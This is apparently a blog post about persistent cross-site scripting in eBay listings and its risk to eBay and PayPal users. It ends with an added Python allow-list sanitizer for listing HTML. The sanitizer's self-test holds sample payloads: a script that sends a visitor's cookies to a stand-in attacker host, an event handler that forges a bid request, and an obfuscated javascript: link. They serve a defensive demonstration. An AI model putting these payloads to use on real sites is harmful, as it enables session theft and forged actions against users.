The dreaded XSRF (cross-site request forgery) exploit is still uncorrected on eBay. That means extreme risk to both eBay and PayPal users.




Let’s begin way back in 1999. This phylum of flaws (cross-site scripting) has existed on eBay since before there were terms coined for it. I produced a quick & dirty video outlining not only that, but how eBay sought to make a public relations play by announcing the removal of sellers’ ability to use active scripting elements in the user-generated content of eBay listings, then quietly reversed the decision and buried that news on a backwater blog. You can cut to the quick by clicking the "more info" area of the video and following the links.


Moving forward.


We blogged this vulnerability back in September. Yet if you follow the links there, you will see the flaw had actually existed for three years.



Now to the present day…


A very interesting read. It points to eBay’s lack of due diligence in protecting users and visitors to the site, and to phishing/organized-crime links. Follow the links and read the comments: they lead to a live XSS listing on video, and to the possibility that a DDoS attack could be launched “on eBay’s own servers” using the malicious code that eBay allows in all listings.
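The root cause this post keeps coming back to is that seller-supplied listing HTML is rendered with its active content intact, so any script a seller embeds runs in the marketplace’s own origin, with the visitor’s session cookies attached to whatever requests it makes. As an added illustration (my own code, not code from the original post or from eBay), here is a hypothetical allow-list sanitizer of the kind a marketplace would run over listing HTML before rendering it. The tag and attribute allow-lists, the `sanitize_listing` name and the listing payloads are all assumptions constructed for the example; the payloads show the three things the post’s linked listing relies on (a `<script>` block, an `onerror` handler, and a `javascript:` link) being reduced to inert markup.

```python
"""Allow-list sanitizer for seller-supplied listing HTML.

Added example with a hypothetical policy; not eBay's code or policy.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allow-list: enough for a formatted listing, with no way to run script.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "ul", "ol", "li",
                "table", "tr", "td", "th", "div", "span", "font", "center",
                "a", "img"}
ALLOWED_ATTRS = {
    "a": {"href"},
    "img": {"src", "alt", "width", "height"},
    "font": {"color", "size"},
    "td": {"colspan", "rowspan"},
    "div": {"align"},
}
VOID_TAGS = {"br", "img"}
# Elements whose entire content is discarded, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "applet"}


def safe_url(value: str) -> bool:
    """Allow http(s) and relative URLs; reject javascript:, data:, vbscript: and friends."""
    # Browsers ignore whitespace and control characters inside a scheme, so
    # strip them before inspection (defeats "java\tscript:" style evasions).
    cleaned = "".join(ch for ch in value if ch > " ")
    return urlparse(cleaned.lower()).scheme in ("", "http", "https")


class ListingSanitizer(HTMLParser):
    """Re-emits only allow-listed tags/attributes; everything else is dropped or escaped."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.skip_depth = 0          # >0 while inside a DROP_WITH_CONTENT element
        self.open_tags: list[str] = []  # allowed tags still awaiting a close tag

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped; its text content is still kept, escaped
        kept = []
        for name, value in attrs:
            # on* handlers, style, etc. are never in the allow-list, so they vanish here.
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name in ("href", "src") and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in VOID_TAGS or tag not in ALLOWED_TAGS or tag not in self.open_tags:
            return
        while self.open_tags:  # close any tags left open inside this one
            closed = self.open_tags.pop()
            self.out.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # text is always re-escaped

    def handle_comment(self, data):
        pass  # comments (including IE conditional comments) are dropped

    def result(self) -> str:
        while self.open_tags:  # close whatever the seller left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_listing(raw_html: str) -> str:
    parser = ListingSanitizer()
    parser.feed(raw_html)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    # Constructed payload of the kind the post describes: cookie exfiltration,
    # a forged same-origin request fired from an event handler, and a javascript: link.
    listing = ('<p onmouseover="alert(1)">Great item</p>'
               '<script>document.location="http://evil.example/?c="+document.cookie</script>'
               '<img src="x" onerror="fetch(\'/bid?item=1\')">'
               '<a href="JAVA\tSCRIPT:alert(1)">click</a>')
    print(sanitize_listing(listing))
```

Run stand-alone it prints `<p>Great item</p><img src="x"><a>click</a>`: the markup a buyer sees is preserved, while nothing that can execute survives. Note that the allow-list is the whole point; a deny-list of known-bad tags would have failed the same way the post says eBay’s quietly reversed policy did, because every new browser feature becomes a new bypass.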
